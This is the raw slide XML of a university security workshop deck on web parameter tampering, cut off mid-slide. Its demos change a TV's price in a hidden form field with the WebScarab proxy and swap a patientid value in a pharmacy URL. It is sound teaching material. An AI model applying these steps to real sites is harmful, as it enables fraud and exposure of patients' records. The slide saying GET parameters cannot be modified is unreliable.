          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="6583680"/>
            <a:ext cx="2743200" cy="26161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100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The University</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> of Texas at Dallas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Shape 105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7696200" y="6583680"/>
            <a:ext cx="1371600" cy="26161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100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>utdallas.edu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Shape 106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495300" y="1455071"/>
            <a:ext cx="8153400" cy="23163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Clr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="6000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Topics in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="6000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Web Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Shape 107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500451" y="3682830"/>
            <a:ext cx="8153400" cy="2316164"/>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Clr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Marina George, Nick Ramos, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>and Travis Wright</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>TexSAW 201</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7</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Parameter Tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Shape 282"/>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419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>“the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t> manipulation of parameters exchanged between client and server in order to modify application data” - OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>Parameters could be modified in the page’s form field or URL to gain access to unauthorized information. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Shape 28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HTTP Request </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Shape 290"/>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Two most commonly used HTTP methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Request data from a source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>usually seen in URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cannot be modified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  Post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Submit data to a source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Not seen in URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Can be modified</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Shape 29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indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Purchase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Item</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Shape 29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Image result for tv" id="299" name="Shape 299"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1351250" y="1496075"/>
            <a:ext cx="6510376" cy="4601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Hidden Fileds.JPG" id="306" name="Shape 306"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="23629" l="25306" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="105575" y="157050"/>
            <a:ext cx="8886025" cy="6016725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="Shape 307"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123350" y="4282875"/>
            <a:ext cx="1054500" cy="365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08" name="Shape 308"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7265100" y="3588675"/>
            <a:ext cx="1726500" cy="1962300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tamper with the form field parameter to change the price of the TV</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457200" y="274638"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Setup WebScarab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Shape 315"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1318350"/>
            <a:ext cx="8229600" cy="4526100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Shape 316"/>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pic>
        <p:nvPicPr>
          <p:cNvPr descr="WebScarab Setup.JPG" id="317" name="Shape 317"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="24817" l="0" r="1039" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="233850" y="1302350"/>
            <a:ext cx="8609525" cy="4924300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="Shape 318"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233850" y="2174150"/>
            <a:ext cx="1806300" cy="2754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pic>
        <p:nvPicPr>
          <p:cNvPr descr="Shopping Cart Purchase.JPG" id="325" name="Shape 325"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-28600" y="2142600"/>
            <a:ext cx="9144001" cy="2615009"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Shape 326"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7259350" y="4083400"/>
            <a:ext cx="1605600" cy="6744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1" name="Shape 331"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="Shape 332"/>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Request before.JPG" id="333" name="Shape 333"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="413275" y="98300"/>
            <a:ext cx="8102436" cy="6151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Parameter Tampering Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="Shape 340"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270325" y="1500375"/>
            <a:ext cx="8644500" cy="984000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Change the price value from 2999.99 to 29.99</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Shape 34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Request before.JPG" id="342" name="Shape 342"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="47037" l="0" r="9836" t="30035"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="229275" y="2590800"/>
            <a:ext cx="8685450" cy="1676675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Shape 343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4196200" y="3607500"/>
            <a:ext cx="1597200" cy="2976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44" name="Shape 344"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4196200" y="5440625"/>
            <a:ext cx="1597200" cy="2976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pic>
        <p:nvPicPr>
          <p:cNvPr descr="paramter tampering.JPG" id="345" name="Shape 345"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="176900" y="4494813"/>
            <a:ext cx="8776601" cy="1551726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Shape 346"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4196200" y="5516825"/>
            <a:ext cx="1597200" cy="365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Successful Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Shape 35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
        <p:nvSpPr>
          <p:cNvPr id="354" name="Shape 354"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2818375" y="3475975"/>
            <a:ext cx="1691100" cy="365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pic>
        <p:nvPicPr>
          <p:cNvPr descr="Capture.JPG" id="355" name="Shape 355"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="22244" l="28749" r="0" t="7337"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="226523" y="1200575"/>
            <a:ext cx="8668503" cy="5049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60" name="Shape 360"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Shape 361"/>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URL Parameter Tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Shape 362"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1255725"/>
            <a:ext cx="8229600" cy="4917900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>URLs can contain values to determine what needs to be done. Modifying those values can result in unauthorized access to information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>	A pharmacy website that allows customers to login then shows their patient ID in the URL.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Shape 36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
        <p:nvSpPr>
          <p:cNvPr id="364" name="Shape 364"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829850" y="4916475"/>
            <a:ext cx="7468800" cy="5793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365" name="Shape 365"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303750" y="4446725"/>
            <a:ext cx="6795900" cy="767100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.abc.com/pharmacy/pre.asp?back=/pharmacy/scripts.asp&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>patientid=790865</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="Shape 366"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1662850" y="4700425"/>
            <a:ext cx="2289600" cy="503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67" name="Shape 367"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1274150" y="5419575"/>
            <a:ext cx="6795900" cy="767100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.abc.com/pharmacy/pre.asp?back=/pharmacy/scripts.asp&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>patientid=153512</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Shape 368"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
